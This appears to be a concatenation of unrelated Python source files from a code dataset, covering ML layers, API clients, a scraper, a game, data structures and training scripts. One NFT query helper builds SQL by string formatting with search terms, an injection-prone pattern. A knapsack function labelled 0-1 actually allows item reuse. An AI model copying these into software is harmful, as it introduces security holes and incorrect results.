pool(input_tensor, name, kh, kw, dh, dw):\n return tf.nn.max_pool(input_tensor,\n ksize=[1, kh, kw, 1],\n strides=[1, dh, dw, 1],\n padding='SAME',\n name=name)\n \ndef mean_pool(input_tensor, name, kh, kw, dh, dw):\n return tf.nn.avg_pool(input_tensor,\n ksize=[1, kh, kw, 1],\n strides=[1, dh, dw, 1],\n padding='SAME',\n name=name)\n\ndef loss(est, gt):\n return 0*tf.reduce_mean(tf.pow((tf.reduce_max(est,axis = [1,2,3])-tf.reduce_max(gt,axis = [1,2,3])),2))+\\\n 1*tf.reduce_mean(tf.reduce_sum(tf.pow((est-gt),2),axis = [1,2,3]))+\\\n 0.1*tf.reduce_mean(tf.pow(((tf.reduce_sum(est,axis = [1,2,3])-\\\n tf.reduce_sum(gt,axis = [1,2,3]))/(tf.reduce_sum(gt,axis = [1,2,3])+1)),2))\n #return tf.losses.mean_squared_error(est, gt) #所以这一步是绝对没法做loss的 est为 (1,192,256,1) gt为(1,33,2,1)\n \n# Module to test the loss layer\nif __name__ == \"__main__\":\n x = tf.placeholder(tf.float32, [1, 20, 20, 1])\n y = tf.placeholder(tf.float32, [1, 20, 20, 1])\n mse = loss(x, y)\n sess = tf.Session()\n dict = {\n x: 5*np.ones(shape=(1,20,20,1)),\n y: 4*np.ones(shape=(1,20,20,1))\n }\n print (sess.run(mse, feed_dict=dict) 
)\n","repo_name":"Halle-Astra/SaCNN_tensorflow","sub_path":"Codes/python与caffe互转/two-scale_model/src/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11820160181","text":"import requests\n\n\nclass VkUser:\n\n url = 'https://api.vk.com/method/'\n\n def __init__(self, token, version):\n self.params = {\n 'access_token': token,\n 'v': version\n }\n\n def get_photos(self, user_id=None, count=5, album='profile'):\n photos_url = self.url + 'photos.get'\n photos_params = {\n 'owner_id': user_id,\n 'album_id': album,\n 'rev': 0,\n 'extended': 1,\n 'photo_sizes': 1,\n 'count': count if count < 1001 else 1000\n }\n res = requests.get(photos_url,\n params={**self.params, **photos_params}).json()\n\n if res.get('error') is not None:\n print(f'Код ошибки: {res[\"error\"][\"error_code\"]}')\n return None\n\n return res['response']['items']\n","repo_name":"JulieSoboleva/Photos_backuper","sub_path":"vk_user.py","file_name":"vk_user.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26232846619","text":"#!/usr/bin/env python3\n#coding=utf-8\n#########################################################################\n# Author: @maris\n# Created Time: May 18 2017 18:55:41 PM CST\n# File Name:spider.py\n# Description:minerva服务\n#########################################################################\nimport sys\nimport re\nimport json\nimport time\nimport io\nimport requests\n\nHOST = \"http://47.243.157.215:8047/query.json\"\n\n\"\"\"\n功能:获得nft查询结果\n输入:db_link, 数据表的链接,形式如/ipfs/QmUtyPDpYMv2tHg7yZSgdUahgEaFjeSwEWx8XjQ7gVaSRW#json\n输入:nft_id, nft id,数据表默认需要包含字段中nft_id\n返回:result, 查询结果列表\n\"\"\"\ndef get_nft_by_id(db_link, nft_id):\n #step 1,构造query\n #query = \"select * from \"\n query = \"select * from ipfs.`{}` where nft_id={}\".format(\n db_link, nft_id\n )\n #print(query)\n #step 2,构造请求\n url = HOST\n header = {\"Content-Type\": \"application/json\"}\n data = {\n \"queryType\":\"SQL\",\n \"query\": query\n }\n\n res = requests.post(url, data=json.dumps(data), headers=header)\n #print(res.json())\n data = res.json()\n\n result = {}\n result[\"status\"] = 0\n result[\"msg\"] = data[\"queryState\"]\n result[\"query_id\"] = data[\"queryId\"]\n result[\"results\"] = data[\"rows\"]\n\n return result\n\n\n\"\"\"\n功能:获得nft查询结果\n输入:db_link, 数据表的链接,形式如/ipfs/QmUtyPDpYMv2tHg7yZSgdUahgEaFjeSwEWx8XjQ7gVaSRW#json\n输入:field,搜索字段,目前暂时只支持一个\n输入:word, 搜索关键词,\n返回:result, 查询结果列表\n\"\"\"\ndef search_nft(db_link,field, word):\n #step 1,构造query\n #query = \"select * from \"\n query = \"select * from ipfs.`{}` where `{}` like '%{}%'\".format(\n db_link, field, word\n )\n #print(query)\n #step 2,构造请求\n url = HOST\n header = {\"Content-Type\": \"application/json\"}\n data = {\n \"queryType\":\"SQL\",\n \"query\": query\n }\n\n res = requests.post(url, data=json.dumps(data), headers=header)\n #print(res.json())\n data = res.json()\n\n result = {}\n result[\"status\"] = 0\n result[\"msg\"] = data[\"queryState\"]\n result[\"query_id\"] = data[\"queryId\"]\n result[\"results\"] = data[\"rows\"]\n\n return result\n\n\nif __name__==\"__main__\":\n nft_id = 1\n db_link = \"/ipfs/QmYUQee1mTUGjEMtk2ZBn8LdE1YVWueF3q5ec7WMgXsGfc#json\"\n #result = get_nft_by_id(db_link, nft_id)\n field = \"title\"\n word = \"bc1\"\n result = search_nft(db_link,field, word)\n 
print(json.dumps(result))\n\n\n","repo_name":"cata-network/api-server","sub_path":"minerva_service.py","file_name":"minerva_service.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24261762503","text":"import pyttsx3\nfrom tqdm import tqdm\nimport time\nimport requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom pyfiglet import Figlet\nf = Figlet(font='slant')\nprint (f.renderText('Temperature'))\ndef speech(a):\n engine = pyttsx3.init()\n engine.say(a)\n engine.runAndWait()\n print(a)\ndef weather(place):\n url = f\"https://www.google.com/search?q=weather in {place}\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,'html.parser')\n temperature = s.find('div',class_='BNeawe').text\n return temperature\n\nif __name__=='__main__':\n place = str(input('place: '))\n for i in tqdm(range(100)):\n time.sleep(0.01)\n a = f'current temperature in {place}: {weather(place)}'\n speech(a)\n\n","repo_name":"Ro706/Temperature","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"25508281733","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n\n def add_car(self):\n chance = random.randint(1, 6)\n if chance == 1:\n car = Turtle()\n car.pu()\n car.color(random.choice(COLORS))\n car.shape(\"square\")\n car.turtlesize(stretch_len=2)\n car.seth(180)\n start_y = random.randrange(-250, 250, 20)\n car.goto(640, start_y)\n self.cars.append(car)\n\n def move_cars(self, round):\n for car in self.cars:\n car.forward(STARTING_MOVE_DISTANCE * round)","repo_name":"sdearth/pythoncourse","sub_path":"turtle-crossing-start/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407356768","text":"\"\"\" The 0-1 Knapsack problem\n\tAn item is in the form of a tuple (weight, value).\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tCreate 2 cases of selecting and not selecting the current item. 
The case that gives the higher\n\tvalue is selected.\n\n\"\"\"\n\n\ndef knapsack_01(items,max_weight):\n\tdp = [[0]*(max_weight+1) for _ in range(len(items))]\n\n\tfor i in range(len(dp)):\n\t\tfor j in range(len(dp[0])):\n\t\t\tif i >= 1:\n\t\t\t\twithout_this_item = dp[i-1][j]\n\t\t\telse:\n\t\t\t\twithout_this_item = 0\n\t\t\tif j >= items[i][0]:\n\t\t\t\twith_this_item = dp[i][j - items[i][0]] + items[i][1]\n\t\t\telse:\n\t\t\t\twith_this_item = 0\n\t\t\tdp[i][j] = max(with_this_item, without_this_item)\n\n\treturn dp[-1][-1]\n\n\nmax_weight = 6\nitems = [(2,6), (2,10), (3,12)]\nprint(\"For the items with (weight, value) = {} and max weight = {}\".format(items, max_weight))\nprint(\"the max value is: {}\".format(knapsack_01(items, max_weight)))","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Dynamic Programming/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"264226775","text":"import json\nimport logging\nimport traceback\nfrom typing import Dict, Optional, Tuple\n\nimport requests\nimport typer\n\nfrom ..lib.ai import AltAI\nfrom ..model.ai_conv_types import MessageNode, Role\nfrom ..model.persistence_model import (\n ParsedEventTable,\n add_geoaddress,\n get_parsed_events,\n)\nfrom ..types.city_event import CityEvent\n\nLOG_FORMAT = \"%(asctime)s - %(levelname)s - [%(name)s:%(lineno)d] - %(message)s\"\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - [%(name)s:%(lineno)d] - %(message)s\",\n handlers=[logging.StreamHandler()],\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\nNOMINATIM_URL = \"http://localhost:8080/search\"\n\n\nclass HTTPException(Exception):\n def __init__(self, status_code, reason, content):\n self.status_code = status_code\n self.reason = reason\n self.content = content\n super().__init__(f\"HTTP {status_code}: {reason}\")\n\n\n# N2S: If we use a public nominatim server, add waiting between requests\ndef get_coordinates(\n params: Dict[str, str]\n) -> Tuple[Optional[float], Optional[float]]:\n # URL of your local Nominatim server\n\n # Make the API request\n response = requests.get(NOMINATIM_URL, params=params, timeout=5)\n\n # Check if the request was successful\n if response.status_code == 200:\n # Parse the JSON response\n data = json.loads(response.text)\n # Check if data was returned\n longitude, latitude = None, None\n if data:\n # Extract latitude and longitude from the first result\n # https://nominatim.org/release-docs/develop/api/Output/\n latitude = data[0][\"lat\"]\n longitude = data[0][\"lon\"]\n\n return latitude, longitude\n else:\n logger.error(\"Raised an error to nomatamin for Params %s \", str(params))\n raise HTTPException(\n response.status_code, response.reason, response.content\n )\n\n\ndef ask(address, alt_ai: AltAI) -> MessageNode:\n return alt_ai.send( # pylint: disable=no-value-for-parameter\n [\n MessageNode(\n role=Role.system,\n message_content=\"\"\"\n I am going to give you some addresses in a string format I want you to normalize them and return the normalized address in a json format.\n \n example if I give you : `1301 Hudson Street, Jersey City`. Return JSON in the following format(triple back ticks are important)):\n ```{\n \"street\": \"1301 Hudson Street\",\n \"city\": \"Jersey City\",\n \"country\": \"United States\",\n }``` \n Use the following rules to do this:\n 0. Do not add the State if its missing in the address.\n 1. 
The addresses I provide you may be badly formatted or too general(since the data is from the web)\n in this case return NOTHING. Example If I give you `Jersey City` or `New York` only return nothing.\n 2. Strip out what might be an apartment or suite number, state from the address. Like for example in:\n \"1301 Adams Street C3, Hoboken\"\n I want you to return the JSON:\n ```{\n \"street\": \"1301 Adams Street\",\n \"city\": \"Hoboken\",\n \"country\": \"United States\",\n }```\n stripping out the C3\n\n 4. Return your answer in a **VALID** json delimited by triple back ticks. \n\n Wait for me to paste the address.\n \"\"\",\n ),\n MessageNode(\n role=Role.user,\n message_content=(f\"Here is the address: {address}\"),\n ),\n ]\n )\n\n\ndef _try_format_address_with_ai(address: str) -> Optional[Dict[str, str]]:\n alt_ai = AltAI()\n ai_message = ask(address, alt_ai)\n address_str = (\n ai_message.message_content.replace(\"```\", \"\")\n if ai_message.message_content\n else None\n )\n if address_str:\n try:\n address_json = json.loads(address_str)\n except json.JSONDecodeError as exc:\n logger.warning(\n \"Failed to parse json from `%s` due to %s\", address_str, exc\n )\n raise exc\n return address_json\n else:\n logger.warning(\"Got no response from ai for %s\", address)\n return None\n\n\ndef do_rcode(\n ctx: typer.Context,\n filename: str,\n version: str,\n parse_failed_only: bool = False,\n) -> None:\n parsed_events = get_parsed_events(\n ctx,\n filename=filename,\n version=version,\n columns=[\n ParsedEventTable.id,\n ParsedEventTable.event_json,\n ParsedEventTable.name,\n ParsedEventTable.description,\n ],\n parse_failed_only=parse_failed_only,\n )\n typer.echo(f\"Got {len(parsed_events)} events to process\")\n for event in parsed_events:\n event_obj = CityEvent(\n **{\n **event.event_json,\n **dict(name=event.name, description=event.description),\n }\n )\n addresses = event_obj.addresses\n if not addresses:\n logger.warning(\"No addresses found for event %d\", event.id)\n continue\n for address in addresses:\n lat, long = None, None\n try:\n lat, long = get_coordinates(params={\"q\": address})\n if lat is None or long is None:\n json_address = _try_format_address_with_ai(address)\n if json_address:\n lat, long = get_coordinates(json_address)\n else:\n raise ValueError(\n f\"Failed to get coordinates from AI as well for adddress {address}!\"\n )\n except Exception as exc: # pylint: disable=broad-exception-caught\n logger.warning(\n \"Failed to get coordinates for %s due to an error %s. Logging this as in the database for event id %d\",\n address,\n exc,\n event.id,\n )\n stack_trace = traceback.format_exc()\n add_geoaddress(\n ctx,\n parsed_event_id=event.id,\n address=address,\n failure_reason=str(stack_trace),\n )\n continue\n logger.debug(\"Adding address %s for id %d\", address, event.id)\n add_geoaddress(\n ctx,\n parsed_event_id=event.id,\n address=address,\n latitude=lat,\n longitude=long,\n failure_reason=None\n if lat and long\n else \"Failed to get find coordinates for this address\",\n )\n\n\n# N2S: Make sure your local Nominatim server is running and accessible at\n# http://localhost:8080. 
Adjust the URL and port as needed.\n","repo_name":"itissid/Drop-PoT","sub_path":"src/drop_backend/commands/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44407323150","text":"#Implement a trie with insert, search, and startsWith methods.\r\n#\r\n#Example:\r\n#\r\n#Trie trie = new Trie();\r\n#\r\n#trie.insert(\"apple\");\r\n#trie.search(\"apple\"); // returns true\r\n#trie.search(\"app\"); // returns false\r\n#trie.startsWith(\"app\"); // returns true\r\n#trie.insert(\"app\"); \r\n#trie.search(\"app\"); // returns true\r\n#Note:\r\n#\r\n#You may assume that all inputs are consist of lowercase letters a-z.\r\n#All inputs are guaranteed to be non-empty strings.\r\n\r\n\r\nclass TrieNode(object):\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.children = {} # mapping from letter to child TrieNodes\r\n self.terminal = False # flag indicates whole word\r\n\r\nclass Trie(object):\r\n\r\n def __init__(self):\r\n self.root = TrieNode()\r\n self.root.terminal = True # empty string is a whole word\r\n\r\n def insert(self, word):\r\n \"\"\"\r\n Inserts a word into the trie.\r\n :type word: str\r\n :rtype: void\r\n \"\"\"\r\n node = self.root\r\n for c in word:\r\n if c not in node.children: # create a node if it does not exist\r\n node.children[c] = TrieNode()\r\n node = node.children[c]\r\n node.terminal = True # set to True at end of word\r\n\r\n def search(self, word):\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n :type word: str\r\n :rtype: bool\r\n \"\"\"\r\n node = self.root\r\n for c in word:\r\n if c in node.children:\r\n node = node.children[c]\r\n else:\r\n return False\r\n return node.terminal # only True if terminal\r\n\r\n def startsWith(self, prefix):\r\n \"\"\"\r\n Returns if there is any word in the trie\r\n that starts with the given prefix.\r\n :type prefix: str\r\n :rtype: bool\r\n \"\"\"\r\n node = self.root\r\n for c in prefix:\r\n if c in node.children:\r\n node = node.children[c]\r\n else:\r\n return False\r\n return True","repo_name":"nileshpaliwal/May-Leetcoding-Challenge-2020","sub_path":"Implement Trie (Prefix Tree).py","file_name":"Implement Trie (Prefix Tree).py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10596484558","text":"import h5py\nimport numpy as np\nfrom skimage.feature import canny\nfrom skimage.util import img_as_float32\n\nfrom atlalign.base import DisplacementField\n\n\ndef load_dataset_in_memory(h5_path, dataset_name):\n \"\"\"Load a dataset of a h5 file in memory.\"\"\"\n with h5py.File(h5_path, \"r\") as f:\n return f[dataset_name][:]\n\n\nclass DatasetAugmenter:\n \"\"\"Class that does the augmentation.\n\n Attributes\n ----------\n original_path : str\n Path to where the original dataset is located.\n\n \"\"\"\n\n def __init__(self, original_path):\n self.original_path = original_path\n\n self.n_orig = len(load_dataset_in_memory(self.original_path, \"image_id\"))\n\n def augment(\n self,\n output_path,\n n_iter=10,\n anchor=True,\n p_reg=0.5,\n random_state=None,\n max_corrupted_pixels=500,\n ds_f=8,\n max_trials=5,\n ):\n \"\"\"Augment the original dataset and create a new one.\n\n Note that this not modify the original dataset.\n\n Parameters\n ----------\n output_path : str\n Path to where the new h5 file stored.\n\n n_iter : int\n Number of augmented 
samples per each sample in the original dataset.\n\n anchor : bool\n If True, then dvf anchored before inverted.\n\n p_reg : bool\n Probability that we start from a registered image\n (rather than the moving).\n\n random_state : bool\n Random state\n\n max_corrupted_pixels : int\n Maximum numbr of corrupted pixels allowed for a dvf - the actual\n number is computed as np.sum(df.jacobian() < 0)\n\n ds_f : int\n Downsampling factor for inverses. 1 creates the least artifacts.\n\n max_trials : int\n Max number of attemps to augment before an identity displacement\n used as augmentation.\n \"\"\"\n np.random.seed(random_state)\n\n n_new = n_iter * self.n_orig\n print(n_new)\n\n with h5py.File(self.original_path, \"r\") as f_orig:\n # extract\n dset_img_orig = f_orig[\"img\"]\n dset_image_id_orig = f_orig[\"image_id\"]\n dset_dataset_id_orig = f_orig[\"dataset_id\"]\n dset_deltas_xy_orig = f_orig[\"deltas_xy\"]\n dset_inv_deltas_xy_orig = f_orig[\"inv_deltas_xy\"]\n dset_p_orig = f_orig[\"p\"]\n\n with h5py.File(output_path, \"w\") as f_aug:\n dset_img_aug = f_aug.create_dataset(\n \"img\", (n_new, 320, 456), dtype=\"uint8\"\n )\n dset_image_id_aug = f_aug.create_dataset(\n \"image_id\", (n_new,), dtype=\"int\"\n )\n dset_dataset_id_aug = f_aug.create_dataset(\n \"dataset_id\", (n_new,), dtype=\"int\"\n )\n dset_p_aug = f_aug.create_dataset(\"p\", (n_new,), dtype=\"int\")\n dset_deltas_xy_aug = f_aug.create_dataset(\n \"deltas_xy\", (n_new, 320, 456, 2), dtype=np.float16\n )\n dset_inv_deltas_xy_aug = f_aug.create_dataset(\n \"inv_deltas_xy\", (n_new, 320, 456, 2), dtype=np.float16\n )\n\n for i in range(n_new):\n print(i)\n i_orig = i % self.n_orig\n\n mov2reg = DisplacementField(\n dset_deltas_xy_orig[i_orig, ..., 0],\n dset_deltas_xy_orig[i_orig, ..., 1],\n )\n\n # copy\n dset_image_id_aug[i] = dset_image_id_orig[i_orig]\n dset_dataset_id_aug[i] = dset_dataset_id_orig[i_orig]\n dset_p_aug[i] = dset_p_orig[i_orig]\n\n use_reg = np.random.random() > p_reg\n print(\"Using registered: {}\".format(use_reg))\n\n if not use_reg:\n # mov != reg\n img_mov = dset_img_orig[i_orig]\n else:\n # mov=reg\n img_mov = mov2reg.warp(dset_img_orig[i_orig])\n mov2reg = DisplacementField.generate(\n (320, 456), approach=\"identity\"\n )\n\n is_nice = False\n n_trials = 0\n\n while not is_nice:\n n_trials += 1\n\n if n_trials == max_trials:\n print(\"Replicating original: out of trials\")\n dset_img_aug[i] = dset_img_orig[i_orig]\n dset_deltas_xy_aug[i] = dset_deltas_xy_orig[i_orig]\n dset_inv_deltas_xy_aug[i] = dset_inv_deltas_xy_orig[i_orig]\n break\n\n else:\n mov2art = self.generate_mov2art(img_mov)\n\n reg2mov = mov2reg.pseudo_inverse(ds_f=ds_f)\n reg2art = reg2mov(mov2art)\n\n # anchor\n if anchor:\n print(\"ANCHORING\")\n reg2art = reg2art.anchor(\n ds_f=50, smooth=0, h_kept=0.9, w_kept=0.9\n )\n\n art2reg = reg2art.pseudo_inverse(ds_f=ds_f)\n\n validity_check = np.all(\n np.isfinite(reg2art.delta_x)\n ) and np.all(np.isfinite(reg2art.delta_y))\n validity_check &= np.all(\n np.isfinite(art2reg.delta_x)\n ) and np.all(np.isfinite(art2reg.delta_y))\n jacobian_check = (\n np.sum(reg2art.jacobian < 0) < max_corrupted_pixels\n )\n jacobian_check &= (\n np.sum(art2reg.jacobian < 0) < max_corrupted_pixels\n )\n\n if validity_check and jacobian_check:\n is_nice = True\n print(\"Check passed\")\n else:\n print(\"Check failed\")\n\n if n_trials != max_trials:\n dset_img_aug[i] = mov2art.warp(img_mov)\n dset_deltas_xy_aug[i] = np.stack(\n [art2reg.delta_x, art2reg.delta_y], axis=-1\n )\n dset_inv_deltas_xy_aug[i] = 
np.stack(\n [reg2art.delta_x, reg2art.delta_y], axis=-1\n )\n\n @staticmethod\n def generate_mov2art(img_mov, verbose=True, radius_max=60, use_normal=True):\n \"\"\"Generate geometric augmentation and its inverse.\"\"\"\n shape = img_mov.shape\n img_mov_float = img_as_float32(img_mov)\n edge_mask = canny(img_mov_float)\n\n if use_normal:\n c = np.random.normal(0.7, 0.3)\n else:\n c = np.random.random()\n\n if verbose:\n print(\"Scalar: {}\".format(c))\n\n mov2art = c * DisplacementField.generate(\n shape,\n approach=\"edge_stretching\",\n edge_mask=edge_mask,\n interpolation_method=\"rbf\",\n interpolator_kwargs={\"function\": \"linear\"},\n n_perturbation_points=6,\n radius_max=radius_max,\n )\n\n return mov2art\n","repo_name":"BlueBrain/atlas-alignment","sub_path":"atlalign/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":7514,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72489830914","text":"from bisect import bisect_left\nimport sys\ninput = sys.stdin.readline\n\n# 파싱\nl = int(input())\nnums = list(map(int, input().split()))\nnums.sort()\nn = int(input())\n\nif n > nums[0]:\n idx = bisect_left(nums, n)\n print(max(0, (nums[idx] - n) * (n - nums[idx - 1]) - 1))\nelse:\n print(max(0, (nums[0] - n) * n - 1))\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/1059_좋은 구간.py","file_name":"1059_좋은 구간.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3205211976","text":"import argparse\nimport json\nimport os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\n\nimport model.net_ubs as net\nfrom data.dataset import underdamped_beadspring_dataset\nfrom misc.logger import load_checkpoint, logging_metrics, save_checkpoint\nfrom misc.sampler import CartesianSeqSampler\n\n\ndef train(opt, neep1, neep2, optim, pos_trajs, vel_trajs, sampler):\n neep1.train()\n neep2.train()\n batch = next(sampler)\n xs = pos_trajs[batch].to(opt.device)\n vs = vel_trajs[batch].to(opt.device)\n\n ent1 = neep1(xs[-1], vs[-1])\n ent2 = neep2(xs, vs)\n\n optim.zero_grad()\n J1 = (ent1 - torch.exp(-ent1)).mean()\n J2 = (ent2 - torch.exp(-ent2)).mean()\n loss = -J1 - J2\n loss.backward()\n optim.step()\n\n return J1.item(), J2.item()\n\n\ndef validate(opt, neep1, neep2, pos_trajs, vel_trajs, sampler):\n neep1.eval()\n neep2.eval()\n\n ret1 = []\n ret2 = []\n\n J1 = 0\n J2 = 0\n with torch.no_grad():\n for batch in sampler:\n xs = pos_trajs[batch].to(opt.device)\n vs = vel_trajs[batch].to(opt.device)\n ent1 = neep1(xs[-1], vs[-1])\n ent2 = neep2(xs, vs)\n\n ret1.append(ent1.cpu().squeeze().numpy())\n ret2.append(ent2.cpu().squeeze().numpy())\n J1 += (ent1 - torch.exp(-ent1)).sum().cpu().item()\n J2 += (ent2 - torch.exp(-ent2)).sum().cpu().item()\n\n J1 = J1 / sampler.size\n J2 = J2 / sampler.size\n\n ret1 = np.concatenate(ret1)\n ret1 = ret1.reshape(pos_trajs.shape[0], -1)\n\n ret2 = np.concatenate(ret2)\n ret2 = ret2.reshape(pos_trajs.shape[0], -1)\n\n return ret1, ret2, J1, J2\n\n\ndef main(opt):\n ##############################\n # Prepare dataset and models #\n ##############################\n trainset = underdamped_beadspring_dataset(opt, seed=0)\n validset = underdamped_beadspring_dataset(opt, seed=1)\n\n pos_trajs_t, vel_trajs_t = trainset[\"position\"], trainset[\"velocity\"]\n val_pos_trajs_t, val_vel_trajs_t = validset[\"position\"], 
validset[\"velocity\"]\n\n torch.manual_seed(opt.seed)\n random.seed(opt.seed)\n\n neep1, neep2 = net.__dict__[opt.arch](opt)\n optim = torch.optim.Adam(\n list(neep1.parameters()) + list(neep2.parameters()),\n opt.lr,\n )\n train_sampler = CartesianSeqSampler(\n opt.trj_num, opt.trj_len, opt.seq_len, opt.batch_size, device=opt.device\n )\n val_sampler = CartesianSeqSampler(\n opt.trj_num,\n opt.trj_len,\n opt.seq_len,\n opt.test_batch_size,\n device=opt.device,\n train=False,\n )\n\n ############\n # Training #\n ############\n if not os.path.exists(opt.save):\n os.makedirs(opt.save)\n\n ret_train = []\n ret_val = []\n\n for i in tqdm(range(1, opt.n_iter + 1)):\n if i % opt.record_freq == 0 or i == 1:\n preds1, preds2, train_J1, train_J2 = validate(\n opt, neep1, neep2, pos_trajs_t, vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n train_log = logging_metrics(\n opt.seq_len, opt.time_step, train_J1, train_J2, preds\n )\n train_log[\"iteration\"] = i\n print(\n \"Train iter: %d J1: %1.4e J2: %1.4e pred: %.5f\"\n % (i, train_log[\"J1\"], train_log[\"J2\"], train_log[\"pred_rate\"])\n )\n\n preds1, preds2, val_J1, val_J2 = validate(\n opt, neep1, neep2, val_pos_trajs_t, val_vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n val_log = logging_metrics(opt.seq_len, opt.time_step, val_J1, val_J2, preds)\n val_log[\"iteration\"] = i\n print(\n \"Valid iter: %d J1: %1.4e J2: %1.4e pred: %.5f\"\n % (i, val_log[\"J1\"], val_log[\"J2\"], val_log[\"pred_rate\"])\n )\n\n if i == 1:\n best_val_J1 = val_J1\n best_val_J2 = val_J2\n best_state_dict1 = neep1.state_dict()\n best_state_dict2 = neep2.state_dict()\n else:\n if best_val_J1 < val_J1:\n best_val_J1 = val_J1\n best_state_dict1 = neep1.state_dict()\n save_checkpoint(\n {\n \"iteration\": i,\n \"state_dict\": best_state_dict1,\n \"best_J\": best_val_J1,\n },\n opt.save,\n \"neep1\",\n )\n if best_val_J2 < val_J2:\n best_val_J2 = val_J2\n best_state_dict2 = neep2.state_dict()\n save_checkpoint(\n {\n \"iteration\": i,\n \"state_dict\": best_state_dict2,\n \"best_J\": best_val_J2,\n },\n opt.save,\n \"neep2\",\n )\n val_log[\"best_J1\"] = best_val_J1\n val_log[\"best_J2\"] = best_val_J2\n ret_train.append(train_log)\n ret_val.append(val_log)\n\n train(opt, neep1, neep2, optim, pos_trajs_t, vel_trajs_t, train_sampler)\n\n del trainset, validset\n\n ############################\n # Testing with best models #\n ############################\n load_checkpoint(\"neep1\", opt.save, neep1)\n load_checkpoint(\"neep2\", opt.save, neep2)\n\n testset = underdamped_beadspring_dataset(opt, seed=2)\n test_pos_trajs_t, test_vel_trajs_t, ents = (\n testset[\"position\"],\n testset[\"velocity\"],\n testset[\"EP\"],\n )\n\n preds1, preds2, J1, J2 = validate(\n opt, neep1, neep2, test_pos_trajs_t, test_vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n test_logs = logging_metrics(opt.seq_len, opt.time_step, J1, J2, preds, ents)\n print(\n \"Test J1: %1.4e J2: %1.4e pred: %.5f R-square: %.5f\"\n % (\n test_logs[\"J1\"],\n test_logs[\"J2\"],\n test_logs[\"pred_rate\"],\n test_logs[\"r_square\"],\n )\n )\n\n ##################################################\n # Save train, valid, test logs & hyperparameters #\n ##################################################\n # train_df = pd.DataFrame(ret_train)\n val_df = pd.DataFrame(ret_val)\n test_df = pd.DataFrame([test_logs])\n\n # train_df.to_csv(os.path.join(opt.save, \"train_log.csv\"), index=False)\n val_df.to_csv(os.path.join(opt.save, \"val_log.csv\"), index=False)\n test_df.to_csv(os.path.join(opt.save, 
\"test_log.csv\"), index=False)\n opt.device = \"cuda\" if use_cuda else \"cpu\"\n hparams = json.dumps(vars(opt))\n with open(os.path.join(opt.save, \"hparams.json\"), \"w\") as f:\n f.write(hparams)\n\n\nif __name__ == \"__main__\":\n arch_names = sorted(\n name\n for name in net.__dict__\n if name.islower() and not name.startswith(\"__\") and callable(net.__dict__[name])\n )\n parser = argparse.ArgumentParser(\n description=\"Neural Entropy Production Estimator for multi bead-spring model\"\n )\n parser.add_argument(\n \"-a\",\n \"--arch\",\n metavar=\"ARCH\",\n default=\"mlp\",\n choices=arch_names,\n help=\"model architecture: \" + \" | \".join(arch_names) + \" (default: mlp)\",\n )\n parser.add_argument(\n \"--N\",\n type=int,\n default=2,\n metavar=\"N\",\n help=\"number of input neuron = number of beads (default: 2)\",\n )\n parser.add_argument(\n \"--trj_num\",\n \"-M\",\n type=int,\n default=10000,\n metavar=\"M\",\n help=\"number of trajectories (default: 10000)\",\n )\n parser.add_argument(\n \"--trj_len\",\n \"-L\",\n type=int,\n default=1000,\n metavar=\"L\",\n help=\"number of step for each trajectory (default: 1000)\",\n )\n parser.add_argument(\n \"--time_step\",\n type=float,\n default=1e-2,\n help=\"time step size of simulation (default: 0.01)\",\n )\n parser.add_argument(\n \"--m\",\n type=float,\n default=1e-2,\n help=\"mass (default: 0.01)\",\n )\n parser.add_argument(\n \"--Tc\",\n type=float,\n default=1,\n metavar=\"T\",\n help=\"Cold heat bath temperature (default: 1)\",\n )\n parser.add_argument(\n \"--Th\",\n type=float,\n default=10,\n metavar=\"T\",\n help=\"Hot heat bath temperature (default: 10)\",\n )\n parser.add_argument(\n \"--save\",\n default=\"./checkpoint\",\n type=str,\n metavar=\"PATH\",\n help=\"path to save result (default: none)\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=4096,\n metavar=\"N\",\n help=\"input batch size for training (default: 